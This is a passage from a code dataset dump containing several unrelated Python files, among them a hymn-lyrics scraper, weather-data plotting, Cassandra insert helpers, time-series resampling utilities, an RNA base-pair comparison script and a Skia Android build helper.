b'\\xe2\\x80\\x93'.decode(),\r\n \"dash2\": b\"\\xe2\\x80\\x94\".decode(),\r\n \"quote\": b'\\xe2\\x80\\x99'.decode(),\r\n \"double-quote\": b'\\xe2\\x80\\x98'.decode(),\r\n \"double-quote-open\": b\"\\xe2\\x80\\x9c\".decode(),\r\n \"double-quote-close\": b\"\\xe2\\x80\\x9d\".decode(),\r\n \"space\": b\"\\xc2\\x9d\".decode(),\r\n \"unknown2\": b\"\\x0b\".decode(),\r\n \"copyright\": b\"\\xc2\\xa9\".decode()\r\n}\r\n\r\ndef get_lyrics(soup_obj):\r\n \"\"\"Gets the lyrics through the website, parses the string\r\n in an XML format and returns that as (string).\r\n \"\"\"\r\n verse_names = []\r\n verse_lines = []\r\n verse_lines_str = \"\"\r\n verses_string = \"\"\r\n\r\n lyrics = soup_obj.find(\"div\", class_=\"lyrics\")\r\n\r\n lyric_titles = lyrics.find_all(\"h2\")\r\n lyric_contents = lyrics.find_all(\"p\")\r\n\r\n for lyric_title in lyric_titles:\r\n if str(lyric_title).find(\"Verse\") != -1:\r\n verse_names.append(lyric_title.string.lower()[0] +\\\r\n lyric_title.string.lower()[6])\r\n\r\n if str(lyric_title).find(\"Refrain\") != -1:\r\n verse_names.append(\"c1\")\r\n\r\n for lyric_content in lyric_contents:\r\n verse_lines_str = str(lyric_content)\r\n verse_lines_str = verse_lines_str\\\r\n .replace(ESCAPE_CHARS[\"double-quote-open\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-close\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"quote\"], \"'\")\\\r\n .replace(ESCAPE_CHARS[\"dash\"], \"-\")\\\r\n .replace(ESCAPE_CHARS[\"dash2\"], \"-\")\\\r\n .replace(ESCAPE_CHARS[\"space\"], \" \")\\\r\n .replace(\":\", \";\")\\\r\n .replace(\"\\n\\n\", \"
\")\\\r\n .replace(\"

\", \"\")\\\r\n .replace(\"

\", \"\")\r\n\r\n verse_lines.append(verse_lines_str)\r\n\r\n for i in range(len(verse_names)):\r\n verses_string += VERSE_FORMAT.format(verse_names[i], verse_lines[i].replace(\"\\n\", \"\"))\r\n\r\n # DEBUG\r\n # print(verses_string)\r\n\r\n return verses_string\r\n\r\ndef get_hymn_title_num(url):\r\n \"\"\"Gets the hymn number and title through the url and parse it.\r\n Returns a (Dict).\r\n \"\"\"\r\n hymn_number = url[41:44]\r\n hymn_title = url[45:].replace(\"-\", \" \").title()\r\n\r\n return {\r\n \"number\": hymn_number,\r\n \"title\": hymn_title\r\n }\r\n\r\ndef get_author(soup_obj, hymn_number):\r\n \"\"\"Get the author name, if not found refer to authors.py.\r\n Returns a (string).\r\n \"\"\"\r\n author = sda.AUTHORS[hymn_number]\r\n return author\r\n\r\ndef get_theme(soup_obj):\r\n \"\"\"Gets the theme from the website, returns as (string)\"\"\"\r\n theme = soup_obj.find(\"dd\", class_=\"hymn-topic\")\r\n\r\n if theme == None:\r\n print(\"No theme found.\")\r\n return \"\"\r\n else:\r\n return theme.a.string.strip()\r\n\r\ndef get_copyright_info(soup_obj):\r\n \"\"\"Gets the copyright info from the website, if no copyright is found then\r\n return an empty (string) else return the info as (string)\"\"\"\r\n copyright = soup_obj.find(\"dd\", class_=\"hymn-copyright\")\r\n\r\n if copyright == None:\r\n print(\"No copyright found.\")\r\n return \"\"\r\n else:\r\n copyright = copyright.p.text\r\n copyright = copyright\\\r\n .replace(\"&\", \"&\")\\\r\n .replace(\"\\n\", \"\")\\\r\n .replace(ESCAPE_CHARS[\"a\"], 'a')\\\r\n .replace(ESCAPE_CHARS[\"copyright\"], \"(c)\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-open\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-close\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"quote\"], \"'\")\\\r\n .replace(ESCAPE_CHARS[\"dash\"], '-')\\\r\n .replace(ESCAPE_CHARS[\"dash2\"], '-')\\\r\n .replace(ESCAPE_CHARS[\"space\"], ' ')\r\n\r\n print(\"COPYRIGHT WARNING!\")\r\n return copyright\r\n\r\ndef main():\r\n \"\"\"Read the URL list, get source code from URL, call functions to get the\r\n hymn number, title, theme, author, copyright info, and verses.\r\n\r\n Read the template file, replace with .format(), create a new file with\r\n the hymn number as the file name, write string to the new XML file.\r\n\r\n Repeat 695 times, the number of hymns. End by closing the URL list.\r\n Terminate the program.\r\n \"\"\"\r\n # Request URL\r\n print(\"Reading from the LIST FILE: \\'{0}\\'\".format(LIST_FILE))\r\n list_file = open(LIST_FILE, 'r')\r\n\r\n # Loop for url available in list file\r\n for line in list_file:\r\n\r\n # DEBUG\r\n # for l in range(1):\r\n # DEBUG\r\n # url = list_file.readline().replace(\"\\n\", \"\")\r\n\r\n url = line.replace(\"\\n\", \"\")\r\n\r\n # Parse the file to source code\r\n print(\"Retriving data from: \\'{0}\\'\".format(url))\r\n source = request.urlopen(url)\r\n source_code = source.read()\r\n soup = BeautifulSoup(source_code, \"html.parser\")\r\n print(\"Retrived data.\")\r\n\r\n # Title of the Hymnal\r\n print(\"Searching for Title.\")\r\n hymn = get_hymn_title_num(url)\r\n print(\"Hymnal Title: \\'{0} - {1}\\'\".format(hymn[\"number\"],\\\r\n hymn[\"title\"]))\r\n\r\n # Author HUNT!!\r\n print(\"Searching for author.\")\r\n author = get_author(soup, hymn[\"number\"])\r\n print(\"Author: \\'{0}\\'\".format(author))\r\n author = AUTHOR_FORMAT.format(author)\r\n\r\n # DEBUG\r\n # print(author)\r\n\r\n # Theme of the hymnal\r\n print(\"Searching the theme.\")\r\n theme = get_theme(soup)\r\n print(\"Theme: \\'{0}\\'\".format(theme))\r\n\r\n # Copyright search\r\n print(\"Searching for copyright info.\")\r\n copyright = get_copyright_info(soup)\r\n if copyright != \"\":\r\n copyright = COPYRIGHT_FORMAT.format(copyright)\r\n\r\n # DEBUG\r\n # print(\"\\'{0}\\'\".format(copyright))\r\n\r\n # Lyrics of the Hymnal\r\n print(\"Parsing Lyrics...\")\r\n hymn_verses = get_lyrics(soup)\r\n\r\n # DEBUG\r\n # print(hymn_verses)\r\n\r\n print(\"Parsed.\")\r\n\r\n print(\"Opening TEMPLATE FILE: \\'{0}\\'\".format(TEMPLATE_FILE))\r\n openlyrics_template = open(TEMPLATE_FILE, 'r')\r\n xml_content = openlyrics_template.read()\r\n\r\n print(\"Closing the TEMPLATE FILE.\")\r\n openlyrics_template.close()\r\n # {0} -> hymn[\"number\"]\r\n # {1} -> hymn[\"title\"]\r\n # {2} -> copyright\r\n # {3} -> author\r\n # {4} -> theme\r\n # {5} -> hymn_verses\r\n xml_content = xml_content.format(hymn[\"number\"], hymn[\"title\"], copyright,\\\r\n author, theme, hymn_verses)\r\n\r\n print(\"Creating NEW FILE: \\'\" + hymn[\"number\"] + \".xml\\'\")\r\n new_xml_file = open(OUTPUT_FILE_DIR + hymn[\"number\"] + \".xml\", 'w')\r\n new_xml_file.write(xml_content)\r\n\r\n print(\"SUCCESSFUL WRITE: \\'\" + hymn[\"number\"] + \".xml\\'\")\r\n\r\n print(\"Closing NEW FILE.\")\r\n new_xml_file.close()\r\n\r\n print(\"Closing LIST FILE.\")\r\n list_file.close()\r\n\r\n print(\"SUCCESSFULLY CLOSED. ENDING PROGRAM.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"sda2openlyrics_extractor2.py","file_name":"sda2openlyrics_extractor2.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"559629710","text":"import time\n\n\ndef ASTAR(array, start, goal, heuristic, diagnoal_allowed=False, peanlize_diagonals=False):\n start_time = time.time()\n # set this to the coordinates of the neighbors you want to check eg. (0, 1) to go one right, (0, -1) to go one right etc.\n # put code to handle checking only non-diagonal neighbors according to diagonal_allowed? parameter\n neighbors = []\n all_checked = [] #this is a list of coordinates to plot the entire search path.\n path = [] #this is the shortest path\n\n '''\n Enter your code here \n\n\n\n\n '''\n\n end_time = time.time()\n return False, all_checked, [], end_time - start_time\n","sub_path":"prog_assignment2/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"380433020","text":"#!/usr/bin/env python3\n\"\"\"Standard logging template in preferred format\"\"\"\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n# Logging configuration\nlog = logging.getLogger(__name__)\nlog.setLevel(getattr(logging, \"INFO\"))\nlog_format = logging.Formatter(\"%(asctime)s [%(levelname)s] %(message)s\")\n# Log to file\n# Ensures logs are written to the project folder even if the script is\n# executed from another directory\nlog_path = \"/\".join(__file__.split(\"/\")[:-1])\nlog_file = RotatingFileHandler(\n filename=\"{}/application.log\".format(log_path if log_path else '.'),\n maxBytes=10 * 1024 * 1024, # Bytes to Megabytes\n backupCount=5\n )\nlog_file.setFormatter(log_format)\nlog.addHandler(log_file)\n# Log to console\nlog_stream = logging.StreamHandler()\nlog_stream.setFormatter(log_format)\nlog.addHandler(log_stream)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"236687620","text":"import csv\nfrom datetime import datetime\n\nDeath_open = open(\"death_valley_2018_simple.csv\", \"r\")\nSitka_open = open(\"sitka_weather_2018_simple.csv\", \"r\")\n\nDeath_file = csv.reader(Death_open, delimiter=\",\")\nSitke_file = csv.reader(Sitka_open, delimiter=\",\")\n\nheader_row = next(Death_file)\nheader_row = next(Sitke_file)\n\n\nfor index, column_header in enumerate(header_row):\n print(\"Index:\", index, \"Column Name:\", column_header)\n\n\ndeath_highs = []\ndeath_lows = []\ndeath_dates = []\n\nSitka_highs = []\nSitka_lows = []\nSitka_dates = []\n\n# converted_date = datetime.strptime(\"2018-07-01\", \"%y-%m-%d\")\n\nfor row in Death_file:\n try:\n dhigh = int(row[4])\n dlow = int(row[5])\n ddate = datetime.strptime(row[2], \"%Y-%m-%d\")\n except ValueError:\n print(f\"missing data for {ddate}\")\n else:\n death_highs.append(dhigh)\n death_lows.append(dlow)\n death_dates.append(ddate)\n\n\nfor row in Sitke_file:\n try:\n Shigh = int(row[5])\n Slow = int(row[6])\n Sdate = datetime.strptime(row[2], \"%Y-%m-%d\")\n except ValueError:\n print(f\"missing data for {Sdate}\")\n else:\n Sitka_highs.append(Shigh)\n Sitka_lows.append(Slow)\n Sitka_dates.append(Sdate)\n\n\nimport matplotlib.pyplot as plt\n\nfig, a = plt.subplots(2)\na[0].plot(Sitka_dates, Sitka_highs, c=\"red\")\na[0].plot(Sitka_dates, Sitka_lows, c=\"blue\")\na[1].plot(death_dates, death_highs, c=\"red\")\na[1].plot(death_dates, death_lows, c=\"blue\")\n\n\na[0].set_title(\n \"Temperature comparison between SITKA AIRPORT, AK US and DEATH VALLEY, CA US \\n SITKA AIRPORT, AK US \",\n fontsize=16,\n)\n\na[1].set_title(\n \"DEATH VALLEY, CA US\",\n fontsize=16,\n)\n\na[0].fill_between(Sitka_dates, Sitka_highs, Sitka_lows, facecolor=\"blue\", alpha=0.1)\nplt.tick_params(axis=\"both\", labelsize=12)\n\na[1].fill_between(death_dates, death_highs, death_lows, facecolor=\"blue\", alpha=0.1)\nplt.tick_params(axis=\"both\", labelsize=12)\n\nfig.autofmt_xdate()\nplt.show()","sub_path":"DV_ST_Charts.py","file_name":"DV_ST_Charts.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376046365","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass QianchengwuyouItem(scrapy.Item):\n list = ['工作岗位', '城市', '地区', 'more','薪资范围', '平均薪资', '招聘人数', '学历要求', '工作经验',\n '公司名称', '公司类型', '公司规模', '发布时间', '行业' , '公司福利', '职位链接', '职位信息']\n for li in list:\n exec(li + '=scrapy.Field()')\n\n","sub_path":"Spider_Match_Demo/QianChengWuYou/QianChengWuYou/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376449219","text":"# -*- coding: utf-8 -*-\nimport urllib2\nimport re\n\ndef findMoive(values):\n url = 'https://www.douban.com/search?cat=1002&q='\n geturl = url+values\n request = urllib2.Request(geturl)\n response = urllib2.urlopen(request)\n content = response.read()\n pattern = re.compile(r' (.*?)')\n item = re.findall(pattern,content)\n if len(item) == 0 :\n return '没有找到这个电影'\n else:\n return '豆瓣评分:'+item[0]\n\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"80377548","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport os\n\nfrom functools import reduce\n\ndef str2float(s):\n l = s.split('.')\n return reduce(lambda x, y : x * 10 + y, map(int, l[0])) + \\\n reduce(lambda x, y : x * 0.1 + y, map(int, l[1][::-1])) * 0.1\n\nprint(str2float('1324.123'))\n\nprint(\"%d, %s\", 3, 'test')\n","sub_path":"trash/python/tst-reduce_map_lambda.py","file_name":"tst-reduce_map_lambda.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"118930013","text":"import logging\n\nlog = logging.getLogger()\nlog.setLevel('INFO')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import SimpleStatement\nfrom cassandra.policies import RoundRobinPolicy\n\nKEYSPACE = \"mnist\"\n\n\ndef createKeySpace():\n cluster = Cluster(contact_points=['cassandra'], load_balancing_policy=RoundRobinPolicy(),port=9042,)\n session = cluster.connect()\n\n log.info(\"Creating keyspace...\")\n try:\n session.execute(\"\"\"\n CREATE KEYSPACE %s\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '1' }\n \"\"\" % KEYSPACE)\n\n log.info(\"Setting keyspace...\")\n session.set_keyspace(KEYSPACE)\n\n log.info(\"Creating table...\")\n session.execute(\"\"\"\n CREATE TABLE History (\n IP_Address text,\n access_time timestamp,\n image_path text,\n mnist_result text,\n PRIMARY KEY (IP_Address, access_time)\n )\n \"\"\")\n \n \n except Exception as e:\n log.error(\"Unable to create keyspace\")\n log.error(e)\n\ndef insertData(ip_addr, access_time, image_path, mnist_result):\n cluster = Cluster(contact_points=['cassandra'],load_balancing_policy=None, port=9042,)\n session = cluster.connect()\n log.info(\"Inserting data...\")\n try:\n session.execute(\"\"\" \n INSERT INTO mnist.History (IP_Address, access_time, image_path, mnist_result)\n VALUES(%s, %s, %s, %s);\n \"\"\",\n (ip_addr, access_time, image_path, mnist_result)\n )\n except Exception as e:\n log.error(\"Unable to insert data\")\n log.error(e)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28024078","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport collections\n\nimport pandas as pd\nimport numpy as np\n\n'''\nThese functions seem useful for use outside the break detection.\nTherefore they are made independent from any classes\n'''\n\ndef conditional_temp_resample(ds, how='M', threshold=0.1):\n '''\n Resample a dataframe to the given temporal resolution ('M', 'D', etc.).\n If the number of valid values (not nans) in a resample period (eg. 'M')\n is smaller than the defined threshold, the resample will be NaN Parameters.\n ----------\n ds : pandas.Series\n DataFrame to resample\n how : str\n Time frame for temporal resampling, M = monthly, SMS= semi-month start, SM = semi-month end\n MM=month middle\n threshold : float\n % of valid observations (not nan) in period defined in 'how'\n Returns\n -------\n df_resampled : pd.Series\n The resampled Series\n\n df_count : pd.DataFrame\n Number of observations per period and threshold that had to be reached\n '''\n\n name = ds.name\n df = ds.copy(True).to_frame(name='input')\n\n if all(df['input'].isnull()): # if there are only Nons in the ds\n df['input'].fillna(np.nan, inplace=True)\n threshold = None\n\n if how == 'MM':\n month_middle = True\n how = 'MS'\n else:\n month_middle = False\n\n if not threshold:\n df_resampled = df.resample(how).mean()\n df_count = None\n else:\n if 'M' not in how: # works only for resampling to monthly values\n raise NotImplementedError\n\n years, months = df.index.year, df.index.month\n\n if len(years) == 0 or len(months) == 0:\n return None\n\n startday = datetime(years[0], months[0], 1)\n last_year, last_month = years[-1], months[-1]\n\n if last_month == 12:\n next_month, next_year = 1, last_year + 1\n else:\n next_month, next_year = last_month + 1, last_year\n\n days_last_month = (datetime(next_year, next_month, 1) - datetime(last_year, last_month, 1)).days\n endday = datetime(last_year, last_month, days_last_month)\n\n index_full = pd.DatetimeIndex(start=startday, end=endday, freq='D')\n df_alldays = pd.DataFrame(index=index_full,\n data={'count_should': 1}).resample(how).sum()\n\n\n df_mean = df.resample(how).mean()\n\n df['count'] = 1\n df_mean['count_is'] = df[['count']].resample(how).sum()\n df_mean['count_should'] = df_alldays['count_should'] * threshold\n\n df_filtered = df_mean.loc[df_mean['count_is'] >= df_mean['count_should']]\n\n df_count = df_filtered[['count_should', 'count_is']]\n df_resampled = df_filtered.drop(['count_should', 'count_is'], axis=1)\n\n if month_middle:\n df_resampled = df_resampled.resample(how, loffset=pd.Timedelta(14, 'd')).mean().dropna()\n\n return df_resampled['input'], df_count\n\n\ndef df_conditional_temp_resample(df_in, resample_to, resample_threshold):\n \"\"\"\n Wrapper around resample function to resample the input dataframe\n to the selected period, with the selected threshold for minimum\n temporal coverage in % per observation.\n\n Parameters\n -------\n ds_in : pandas.DataFrame\n DataFrame that should be resampled\n resample_to : 'str'\n Time period to resample to, eg M or D\n resample_threshold : float\n Minimum % of observations in the selected period to calculate a mean\n e.g. 0.1 = 10% valid observations, 1 = 100% valid observations\n\n Returns\n -------\n df_test_resampled : pd.DataFrame\n The resampled DataFrame\n \"\"\"\n\n if df_in.empty:\n return df_in\n\n df = df_in.copy(True) #type: pd.DataFrame\n\n resampled_series = []\n for col in df.columns:\n resampled, _ = conditional_temp_resample(df[col], resample_to, resample_threshold)\n resampled.name = col\n resampled_series.append(resampled)\n\n\n df_resampled = pd.concat(resampled_series, axis=1)\n\n if not df_resampled.columns.size == df.columns.size:\n return df_in\n\n return df_resampled\n\n\ndef filter_by_quantiles(df_in, filter_col, lower=.1, upper=.9):\n '''\n Filters a data frame by dropping the >upper % and % f' % (filter_col, upper_threshold, filter_col, lower_threshold)).index\n # index_masked = df[(df[colname] < upper_threshold) & (df[colname] > lower_threshold)].index\n df_in.loc[index_masked, 'diff_flag'] = 0\n\n masked_values = df_in['diff_flag']\n return masked_values\n\n\ndef crosscorr(can, ref, lag=0, method='spearman'):\n \"\"\"\n Calculate the cross correlation between 2 pandas Series with the passed lag(s)\n\n Parameters\n ----------\n can : pd.Series\n Candidate data set (that is shifted)\n ref : pd.Series\n Reference data set (that is stationary)\n lag : int or list\n Lag(s) for which the correlations are calculated (can is shifted)\n method : str\n Correlation type, as in pd.corr ('pearson', 'spearman', etc.)\n\n Returns\n ----------\n ccorr : float or list\n Cross correlations between can and ref for the selected time lag(s)\n \"\"\"\n\n if not isinstance(lag, collections.Iterable):\n return ref.corr(can.shift(lag), method=method)\n else:\n return [ref.corr(can.shift(lag), method=method) for lag in lag]\n\n\ndef autocorr(can, lag=0, method='spearman'):\n \"\"\"\n Calculate the auto correlation for a pandas Series with the passed lag(s)\n\n Parameters\n ----------\n can : pd.Series\n Candidate data set (that is shifted)\n lag : int or list\n Lag(s) for which the correlations are calculated\n method : str\n Correlation type, as in pd.corr ('pearson', 'spearman', etc.)\n\n Returns\n ----------\n acorr : float or list\n Auto correlations between can and ref for the selected time lag(s)\n \"\"\"\n\n if not isinstance(lag, collections.Iterable):\n return can.corr(can.shift(lag), method=method)\n else:\n return [can.corr(can.shift(lag), method=method) for lag in lag]\n\ndef flatten_dict(d):\n '''\n Flattens a dict of dicts so that the keys of 2 levels are merged into 1 key which contains the data of the\n sublevel dictionary.\n\n Parameters\n ----------\n d : dict\n Dict of dicts that will be flattened.\n\n\n Returns\n -------\n flat : dict\n Flattened dictionary\n\n '''\n def expand(key, value):\n if isinstance(value, dict):\n return [ (key + '_' + k, v) for k, v in flatten_dict(value).items() ]\n else:\n return [ (key, value) ]\n\n items = [ item for k, v in d.items() for item in expand(k, v) ]\n\n return dict(items)\n\n\n\n\nif __name__ == '__main__':\n # test crosscorr\n x = pd.Series(index=pd.DatetimeIndex(start='2000-01-01', end='2000-12-31', freq='D'), data=np.random.rand(366))\n y = pd.Series(index=pd.DatetimeIndex(start='2000-01-01', end='2000-12-31', freq='D'), data=np.random.rand(366))\n\n lags = range(100)\n cc_fct = pd.Series(index=lags, data=crosscorr(x,y,lags))\n","sub_path":"breakadjustment/break_standalone_functions.py","file_name":"break_standalone_functions.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"534864737","text":"def string_reverser(our_string):\n new_string = \"\"\n\n for index in range(len(our_string)):\n new_string = new_string + our_string[(len(our_string) -1) - index]\n\n return new_string\n\ndef anagram_checker(str1, str2):\n str1 = str1.replace(\" \", \"\").lower()\n str2 = str2.replace(\" \", \"\").lower()\n\n if len(str1) == len(str2):\n if sorted(str1) == sorted(str2):\n return True\n\n return False\n\ndef word_flipper(our_string):\n word_list = our_string.split(\" \")\n\n for index in range(len(word_list)):\n word_list[index] = word_list[index][::-1]\n\n return \" \".join(word_list)\n\ndef hamming_distance(str1, str2):\n if len(str1) == len(str2):\n count = 0\n\n for char in range(len(str1)):\n if str1[char] != str2[char]:\n count += 1\n\n return count\n\n return None","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"412217401","text":"'''\nFuck RNN\n'''\n\nstr_src = list()\nstr_dist = list()\n\nwith open('test_ans.txt') as f:\n for line in f.readlines():\n line = line.strip() \n str_src.append(str(line))\n\nwith open('test_res.txt') as f:\n for line in f.readlines():\n line = line.strip() \n str_dist.append(str(line))\n\nlist_src = list()\nlist_dist = list()\n\nfor word in str_src:\n list_src.append(word.split(' '))\n\nfor word in str_dist:\n list_dist.append(word.split(' '))\n\nlist_src_pair = list()\nlist_dist_pair = list()\n\nall_real_pair = 0\nall_pred_pair = 0\nall_err_pair = 0 # -1 in predict data\nlist_real_pair = list()\nlist_pred_pair = list()\nlist_err_pair = list()\n\nfor i, sentence in enumerate(list_src):\n stack = []\n tmp_src_pair = [0 for i in range(len(sentence))]\n sent_pair = 0\n for j, char in enumerate(sentence):\n if char == '(':\n stack.append(['(', j])\n elif char == ')':\n stack_pop = stack.pop()\n tmp_src_pair[j] = stack_pop[1] + 1\n tmp_src_pair[stack_pop[1]] = j + 1\n # pair\n all_real_pair = all_real_pair + 1\n sent_pair = sent_pair + 1\n\n if len(stack) != 0:\n for i in range(len(stack)):\n stack_pop = stack.pop()\n tmp_src_pair[j] = -1\n list_src_pair.append(tmp_src_pair)\n list_real_pair.append(sent_pair)\n\n\nfor i, sentence in enumerate(list_dist):\n stack = []\n tmp_dist_pair = [0 for i in range(len(sentence))]\n sent_pair = 0\n err_pair = 0\n for j, char in enumerate(sentence):\n if char == '(':\n stack.append(['(', j])\n elif char == ')':\n if len(stack) != 0:\n stack_pop = stack.pop()\n tmp_dist_pair[j] = stack_pop[1] + 1\n tmp_dist_pair[stack_pop[1]] = j + 1\n # pair\n all_pred_pair = all_pred_pair + 1\n sent_pair = sent_pair + 1\n else:\n stack.append([')', j])\n if len(stack) != 0:\n for i in range(len(stack)):\n stack_pop = stack.pop()\n tmp_dist_pair[j] = -1\n all_err_pair = all_err_pair + 1\n err_pair = err_pair + 1\n list_dist_pair.append(tmp_dist_pair)\n list_pred_pair.append(sent_pair)\n list_err_pair.append(err_pair)\n\nprint('[OK] Stack processing...')\nprint(' ')\n\nall_TP = 0\nall_FN = 0\nall_FP = 0 \n\navg_sen = 0 # sen = tp/(tp+fn)\navg_spec = 0 # spec = tp/(tp+fp)\n\ncmp_len = len(list_dist_pair)\n\nwith open('compare_log.txt', 'w') as f:\n for i in range(cmp_len):\n print('compare epoch ' + str(i))\n f.write('compare epoch ' + str(i) + '\\n')\n print('=====================')\n f.write('=====================' + '\\n')\n\n line_TP = 0\n line_FN = 0\n line_FP = 0\n line_sen = 0\n line_spec = 0\n\n line_flag = [0 for j in range(min(len(list_src_pair[i]), len(list_dist_pair[i])))]\n for j in range(min(len(list_src_pair[i]), len(list_dist_pair[i]))):\n # TP\n if (list_src_pair[i][j] == list_dist_pair[i][j] and line_flag[j] == 0 and line_flag[list_src_pair[i][j]-1] == 0):\n all_TP = all_TP + 1\n line_TP = line_TP + 1\n line_flag[j] = 1\n line_flag[list_src_pair[i][j]-1] = 1\n # FN\n elif (list_src_pair[i][j] > 0 and list_dist_pair[i][j] == 0):\n all_FN = all_FN + 1\n line_FN = line_FN + 1\n # FP\n elif (list_src_pair[i][j] == 0 and list_dist_pair[i][j] > 0):\n all_FP = all_FP + 1\n line_FP = line_FP + 1\n\n line_sen = line_TP / (line_TP + line_FN)\n line_spec = line_TP / (line_TP + line_FP)\n\n avg_sen = avg_sen + line_sen\n avg_spec = avg_spec + line_spec\n\n print('line actual pairs: ' + str(list_real_pair[i]))\n f.write('line actual pairs: ' + str(list_real_pair[i]))\n f.write('\\n')\n\n print('line predict pairs: ' + str(list_pred_pair[i]))\n f.write('line predict pairs: ' + str(list_pred_pair[i]))\n f.write('\\n')\n\n print('line error pairs: ' + str(list_err_pair[i]))\n f.write('line error pairs: ' + str(list_err_pair[i]))\n f.write('\\n')\n\n print('line true positive: ' + str(line_TP))\n f.write('line true positive: ' + str(line_TP))\n f.write('\\n')\n\n print('line false negative: ' + str(line_FN))\n f.write('line false negative: ' + str(line_FN))\n f.write('\\n')\n\n print('line false positive: ' + str(line_FP))\n f.write('line false positive: ' + str(line_FP))\n f.write('\\n')\n\n print('line sensitivity: ' + str(line_sen))\n f.write('line sensitivity: ' + str(line_sen))\n f.write('\\n')\n\n print('line specificity: ' + str(line_spec))\n f.write('line specificity: ' + str(line_spec))\n f.write('\\n')\n\n print(' ')\n f.write('\\n')\n\n all_sen = all_TP / (all_TP + all_FN)\n all_spec = all_TP / (all_TP + all_FP)\n avg_sen = avg_sen / cmp_len\n avg_spec = avg_spec / cmp_len\n\n print('compare result')\n f.write('compare result')\n f.write('\\n')\n\n print('=====================')\n f.write('=====================')\n f.write('\\n')\n \n print('all actual pairs: ' + str(all_real_pair))\n f.write('all actual pairs: ' + str(all_real_pair))\n f.write('\\n')\n\n print('all predict pairs: ' + str(all_pred_pair))\n f.write('all predict pairs: ' + str(all_pred_pair))\n f.write('\\n')\n\n print('all error pairs: ' + str(all_err_pair))\n f.write('all error pairs: ' + str(all_err_pair))\n f.write('\\n')\n\n print('all true positive: ' + str(all_TP))\n f.write('all true positive: ' + str(all_TP))\n f.write('\\n')\n\n print('all false negative: ' + str(all_FN))\n f.write('all false negative: ' + str(all_FN))\n f.write('\\n')\n\n print('all false positive: ' + str(all_FP))\n f.write('all false positive: ' + str(all_FP))\n f.write('\\n')\n\n print('all sensitivity: ' + str(all_sen))\n f.write('all sensitivity: ' + str(all_sen))\n f.write('\\n')\n\n print('all specificity: ' + str(all_spec))\n f.write('all specificity: ' + str(all_spec))\n f.write('\\n')\n\n print('average sensitivity: ' + str(avg_sen))\n f.write('average sensitivity: ' + str(avg_sen))\n f.write('\\n')\n\n print('average specificity: ' + str(avg_sen))\n f.write('average specificity: ' + str(avg_sen))","sub_path":"Milestone/Milestone III/150xSeqNP_OK/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":6471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"43423249","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport default_flavor\n\n\"\"\"GN Android flavor utils, used for building Skia for Android with GN.\"\"\"\nclass GNAndroidFlavorUtils(default_flavor.DefaultFlavorUtils):\n def supported(self):\n return 'GN_Android' == self.m.vars.builder_cfg.get('extra_config', '')\n\n def _run(self, title, cmd):\n path = self.m.vars.default_env['PATH']\n self.m.vars.default_env = {'PATH': path}\n self.m.run(self.m.step, title, cmd=cmd, cwd=self.m.vars.skia_dir, env={})\n\n def compile(self, unused_target, **kwargs):\n compiler = self.m.vars.builder_cfg.get('compiler')\n configuration = self.m.vars.builder_cfg.get('configuration')\n os = self.m.vars.builder_cfg.get('os')\n target_arch = self.m.vars.builder_cfg.get('target_arch')\n\n assert compiler == 'Clang' # At this rate we might not ever support GCC.\n\n ndk_asset = 'android_ndk_linux' if os == 'Ubuntu' else 'android_ndk_darwin'\n\n quote = lambda x: '\"%s\"' % x\n gn_args = ' '.join('%s=%s' % (k,v) for (k,v) in sorted({\n 'is_debug': 'true' if configuration == 'Debug' else 'false',\n 'ndk': quote(self.m.vars.slave_dir.join(ndk_asset)),\n 'target_cpu': quote(target_arch),\n }.iteritems()))\n\n self._run('fetch-gn', 